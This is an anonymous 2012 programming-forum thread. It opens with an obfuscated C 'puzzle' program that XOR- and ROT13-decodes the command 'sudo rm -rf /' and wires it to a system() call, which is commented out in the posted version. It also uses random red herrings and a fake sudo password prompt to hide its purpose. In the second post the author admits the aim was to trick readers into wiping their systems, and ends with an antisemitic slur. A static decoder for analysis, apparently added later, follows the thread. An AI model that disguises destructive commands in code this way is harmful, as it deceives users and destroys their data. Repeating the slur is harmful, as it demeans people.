
Secret

Name: Anonymous 2012-06-06 17:04

Can you figure out what this secret program does? It's so secret, even I don't know what it is. Nothing seems to happen when I run it.

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#include <time.h>
#include <unistd.h>

#define SUPERSECRET    "OAXQ)HI)$HZ)&"

static int secret(char* buffer, int count, int key1, int key2)
{
    int i, ret = 0;

    if ((((int)rand()) % 2) == 0) {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key1;
    } else {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key2;
    }
    for (i = 0; i < count; ++i) {
        int c = tolower(buffer[i]);
        if ((c < 'a') || (c > 'z'))
            continue;
        else if (c <= 'a' + 13)
            c += 13;
        else
            c -= 13;
        buffer[i] = c;
    }
    if ((((int)rand()) % 2) == 0) {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key2;
    } else {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key1;
    }
    for (i = 0; i < count; ++i) {
        buffer[i] = tolower(buffer[i]);
        ret += buffer[i];
    }
    return ret;
}

int main()
{
    char* buffer = calloc(strlen(SUPERSECRET) + 1, 1);
    int ret = 0;
    srand((unsigned)time(NULL));
    while (ret != 1070) {
        strncpy(buffer, SUPERSECRET, strlen(SUPERSECRET));
        ret = secret(buffer, (int)strlen(buffer), 43, 34);
    }
    if ((ret & 31) == 31) {
        fprintf(stderr, "[sudo] password for %s", getenv("USER"));
        getpass(": ");
    }
//    system(buffer);
    free(buffer);
    return 0;
}

Name: Anonymous 2012-06-06 22:09

Ok, OP here, I was bored and wanted to see if I could trick anyone into executing "sudo rm -rf /" in a ridiculously roundabout way. I wasn't expecting anyone on /prog/ to be dumb enough to run it, before anyone asks. I also posted it on /g/ but Firefox decided not to noko and I lost the thread (lol).

The "secret" function is a xor cypher which is then ROT13'd and then xor'd again with two different keys. I wrote a smaller version, put the text as "sudo rm -rf /", and then got the #define'd text. Then I reversed the keys so that it would be undone to transform the text back into "sudo rm -rf /". Then I added the calls to rand() as a red herring. Then, to confirm that the correct string was being generated, I summed the ASCII values of the characters in "sudo rm -rf /" (1070) and used that to make sure it was generating the right string (because of the rand() calls, there are 4 strings it can generate from the same input text). Then I added the pseudo-sudo thing at the end as another red herring, because when the command is executed it'll ask for the user's password. That was to make it look like it was the program pretending to be sudo, rather than the actual sudo command being executed.

And I would've gotten away with it too, if it weren't for you meddling jews.
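A static way to check the explanation above, as an added example that is not part of either post: it reuses the posted transform but takes the two rand() choices as arguments, so all four possible outputs can be printed without the retry loop and without anything reaching system(). The names decode_path and CHECKSUM are assumptions introduced here.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define SUPERSECRET "OAXQ)HI)$HZ)&"  /* constant from the posted program */
#define CHECKSUM    1070             /* value main() loops until it sees */

/* Same transform as the posted secret(), with the two rand() coin flips
 * replaced by explicit key arguments. Writes the result to out and returns
 * the character sum. Nothing is ever passed to system(). */
static int decode_path(int first_key, int second_key, char *out)
{
    int i, sum = 0, n = (int)strlen(SUPERSECRET);

    memcpy(out, SUPERSECRET, (size_t)n + 1);
    for (i = 0; i < n; ++i)
        out[i] ^= first_key;
    for (i = 0; i < n; ++i) {
        int c = tolower((unsigned char)out[i]);
        if (c < 'a' || c > 'z')
            continue;
        out[i] = (char)((c <= 'a' + 13) ? c + 13 : c - 13); /* as posted */
    }
    for (i = 0; i < n; ++i)
        out[i] ^= second_key;
    for (i = 0; i < n; ++i) {
        out[i] = (char)tolower((unsigned char)out[i]);
        sum += out[i];
    }
    return sum;
}

int main(void)
{
    static const int keys[2] = { 43, 34 };  /* key1, key2 from main() */
    char out[sizeof(SUPERSECRET)];
    int a, b;

    /* Enumerate the four branch combinations instead of running the loop. */
    for (a = 0; a < 2; ++a)
        for (b = 0; b < 2; ++b) {
            int sum = decode_path(keys[a], keys[b], out);
            printf("xor %d, rot13, xor %d -> sum %4d %s \"%s\"\n",
                   keys[a], keys[b], sum,
                   sum == CHECKSUM ? "MATCH" : "     ", out);
        }
    return 0;
}
```

Only the key1-then-key2 path reaches the checksum, and 1070 & 31 is 14, so the fake password prompt in the posted main() is never shown.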
